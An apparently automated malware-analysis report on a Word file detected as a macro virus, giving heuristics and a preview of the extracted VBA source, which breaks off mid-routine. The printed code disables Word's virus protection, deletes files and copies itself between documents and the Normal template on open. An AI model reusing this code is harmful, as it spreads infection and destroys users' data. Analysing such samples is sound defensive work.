Verdict: MALICIOUS
Risk Score: 140
MITRE ATT&CK: T1059.005 Visual Basic
Malware Insights
The file contains legacy WordBasic macros that attempt to disable security features and delete various files, including startup entries and temporary files. The presence of an AutoOpen macro and the ClamAV detection strongly indicate malicious intent. The script's primary function appears to be system preparation, likely for a secondary payload, though the full execution chain is not visible.
Heuristics (4)
- ClamAV: Doc.Virus.Diperis-6922877-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Virus.Diperis-6922877-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4296 bytes |

SHA-256: 5d6dedbc8f10e79014ab9ad1465e5c733a9172732cdd98ad95001ef90878d194
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Word97"
Sub WAntidot()
Options.SaveNormalPrompt = False
Options.VirusProtection = False
Options.SavePropertiesPrompt = False
CommandBars.ActiveMenuBar.Enabled = True
CommandBars("Control Toolbox").Enabled = True
CommandBars("Forms").Enabled = True
CommandBars("ActiveX Control").Enabled = True
CommandBars("Visual Basic").Enabled = True
On Error Resume Next
Kill "C:\Program Files\Microsoft Office\Office\StartUp\*.dot"
Kill "C:\WINDOWS\FAQ.doc"
Kill "C:\WINDOWS\Application Data\Microsoft\Excel\XLSTART\excel2r.xls"
Kill "C:\Program Files\Microsoft Office\Office\XLStart\excel2r.xls"
Kill "C:\windows.reg"
Kill "C:\fix.bat"
Kill "C:\sex.txt.vbs"
A2N
z = 0
p = MsgBox("File diperiksa : " + ActiveDocument.Name + " !")
On Error Resume Next
For Each obj In ActiveDocument.VBProject.VBComponents
z = z + 1
If obj.Name = "Word97" Or obj.Name = "ThisDocument" Then
GoTo lompat
End If
Set mok = ActiveDocument.VBProject.VBComponents.Item(z)
xx = mok.CodeModule.CountOfLines
xy = Int(xx / 25) + 1
x = 0
xyz = 1
p = MsgBox("Ditemukan macro : " + obj.Name + " !")
While x < xy
xad1 = mok.CodeModule.Lines(xyz, 25)
x = x + 1
xyz = xyz + 25
Wend
ActiveDocument.VBProject.VBComponents(z).export "c:\my documents\" & obj.Name & "m2r.txt"
ActiveDocument.VBProject.VBComponents.Remove ActiveDocument.VBProject.VBComponents(obj.Name)
lompat:
Next obj
On Error Resume Next
For Each obj In NormalTemplate.VBProject.VBComponents
If obj.Name <> "Word97" And obj.Name <> "ThisDocument" Then
NormalTemplate.VBProject.VBComponents.Remove NormalTemplate.VBProject.VBComponents(obj.Name)
End If
Next obj
p = MsgBox("File : " + ActiveDocument.Name + " bebas dari macro !")
End Sub
Sub FileOpen()
WordBasic.DisableAutoMacros True
On Error Resume Next
If Dialogs(wdDialogFileOpen).Show <> 0 Then
WAntidot
End If
N2A
WordBasic.DisableAutoMacros False
End Sub
Sub AutoOpen()
WordBasic.DisableAutoMacros True
On Error Resume Next
A2N
WAntidot
N2A
WordBasic.DisableAutoMacros False
End Sub
Sub A2N()
TempPath = Application.NormalTemplate.Path & Application.PathSeparator
Set Sumber = ActiveDocument
Set Target = NormalTemplate
sehat = False
For Each obj In Target.VBProject.VBComponents
If obj.Name = "Word97" Then sehat = True
If (obj.Name <> "ThisDocument") And (obj.Name <> "Reference To Normal") And (obj.Name <> "Word97") Then
Target.VBProject.VBComponents.Remove Target.VBProject.VBComponents(obj.Name)
objKorban = True
End If
Next obj
If sehat = False Then
x = Infect(Sumber, Target, "Word97")
End If
On Error Resume Next
NormalTemplate.Save
End Sub
Function Infect(Sumber, Target, obj As String) As Boolean
On Error GoTo ILari
Sumber.VBProject.VBComponents(obj).export TempPath & obj
Target.VBProject.VBComponents.Import TempPath & obj
Infect = True
Kill TempPath & obj
Exit Function
ILari:
End Function
Sub N2A()
TempPath = Application.NormalTemplate.Path & Application.PathSeparator
Set Sumber = NormalTemplate
Set Target = ActiveDocument
sehat = False
For Each obj In Target.VBProject.VBComponents
If obj.Name = "Word97" Then sehat = True
If (obj.Name <> "ThisDocument") And (obj.Name <> "Reference To Normal") And (obj.Name <> "Word97") Then
Target.VBProject.VBComponents.Remove Target.VBProject.VBComponents(obj.Name)
objK
... (truncated)